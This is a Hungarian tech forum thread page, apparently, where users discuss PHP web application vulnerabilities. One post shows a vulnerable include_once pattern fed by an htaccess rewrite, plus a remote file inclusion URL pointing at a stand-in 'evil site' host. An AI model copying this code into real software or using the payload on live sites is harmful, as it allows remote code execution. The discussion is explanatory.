Hirdetés
- sziku69: Fűzzük össze a szavakat :)
- sziku69: Szólánc.
- btz: Internet fejlesztés országosan!
- Luck Dragon: Asszociációs játék. :)
- GoodSpeed: Munkaügyi helyzet Hajdú-Biharban: észak és dél
- D1Rect: Nagy "hülyétkapokazapróktól" topik
- Real Racing 3 - Freemium csoda
- Brogyi: CTEK akkumulátor töltő és másolatai
- droidic: Safe Mode az agyban
- eBay-es kütyük kis pénzért
Új hozzászólás Aktív témák
-
disy68
aktív tag
válasz
MacCaine
#18710
üzenetére
RFI. Én olyannal találkoztam, hogy a routing volt megoldva ellenőrizetlen bemenetekkel szép url megoldásnál.
Pl: oldal.hu/aloldal
htaccess-el volt egy átirányítás
RewriteRule ^(.*)$ /index.php?path=$1 [NC,L,QSA]ahol az aloldal került a $path változóba, majd ez lett include-olva.
include_once($path);Szóval meghívva a oldal.hu/http://gonoszoldal.hu/meggonoszabb_script.php
Az kerül meghívásra, hogyinclude_once('http://gonoszoldal.hu/meggonoszabb_script.php
'); -
disy68
aktív tag
válasz
MacCaine
#18705
üzenetére
Na így más a helyzet kicsit. Mi az elvárás? Csak a php-s alkalmazás problémáit megtalálni vagy az egész rendszerét? Ha az előbbi, akkor a korábbi link, illetve ez segíthet.
Ha az utóbbi, akkor bonyolódik a helyzet. Ha a webszerver apache, akkor a linkelt oldalon elindulhatsz. Ezen kívül persze lehet az oprendszer is gyenge pont és máris jóval terjedelmesebb a lehetséges sebezhetőségek száma. Nem is beszélve az esetleges egymásra épülő hibák kihasználásáról. -
DNReNTi
őstag
válasz
MacCaine
#18705
üzenetére
Konkretan a webszerverre valo betoreshez nem gondolnam, hogy a PHP lenne a belepesi pont. Ez inkabb linux/unix varazslat kellene hogy legyen. Ha konkretan egy PHP alapu alkalmazast akarsz felnyomni, az mas. Akkor jo kiindulasi alap amit disy68 linkelt.
En SQL injection-nel kezdenem, aztan lehet tovabbmenni session lopassal, XSS-el, esatobbi. Mondom ezt ugy, hogy sose csinaltam meg ilyesmit. -
disy68
aktív tag
-
DNReNTi
őstag
válasz
MacCaine
#18700
üzenetére
Nem feltetlenul kell a konkret peldat megosztani, linkekkel, hozzaferessel es koddal, teszem azt kaptal egy finom SQL injection-t, eleg megkerdezni mit tegyel ellene, min valtoztass, vagy mondjuk valami robot arto fajlt tol es futtata a szervereden, mit lehet tenni, esetleg hogyan authentikalj helyesen.
Ezekre akkor is lehet valaszolni, ha az ember nem tudja pontosan melyik oldalrol van szo. No de nem okoskodok, ha privat, akkor legyen privat. -
De ha lenne ilyen topik, en olvasgatnam.
En SQL injection-nel kezdenem, aztan lehet tovabbmenni session lopassal, XSS-el, esatobbi. Mondom ezt ugy, hogy sose csinaltam meg ilyesmit.
Ejnye.Új hozzászólás Aktív témák
- Milyen asztali (teljes vagy fél-) gépet vegyek?
- Folyószámla, bankszámla, bankváltás, külföldi kártyahasználat
- Battlefield 6
- sziku69: Fűzzük össze a szavakat :)
- Kicsomagoljuk és bemutatjuk a Poco F8 Ultrát
- Mini-ITX
- Kerékpárosok, bringások ide!
- Samsung Galaxy S25 Ultra - titán keret, acélos teljesítmény
- Villanyszerelés
- S.T.A.L.K.E.R. 2: Heart of Chornobyl
- További aktív témák...
- Asus Rog Ally Z1 extreme
- Asus tuf gaming f15 (fx507zc4-hn138)
- Playstation 5 lemezes 825GB CFI-1216A, újra fém pasztázva, 6 hónap garanciával, Bp-i üzletből eladó!
- Karácsonyra, XBOX Series X, karcmentes, mint az új készülék, dobozában, ajándékokkal, 6 hó garancia!
- Lian Li SP850 SFX tápegység /850W Gold/Full moduláris/Fehér/Újszerű/Garancia/Számla/
- AMD AM4-es HP OMEN 25L GT12 alaplapok - B550 chipset
- ÁRGARANCIA!Épített KomPhone i5 14600KF 32/64GB RAM RX 7800 XT 16GB GAMER PC termékbeszámítással
- Keresünk iPhone 15/15 Plus/15 Pro/15 Pro Max
- Lenovo ThinkPad P15 Gen 2 Intel i7-11850H 32GB 1000GB Nvidia RTX A4000 1 év garancia
- Samsung Galaxy S25 Ultra 1024GB/1T Újszerű Kártyafüggetlen 1év Garanciával
Állásajánlatok
Cég: Laptopszaki Kft.
Város: Budapest
Cég: ATW Internet Kft.
Város: Budapest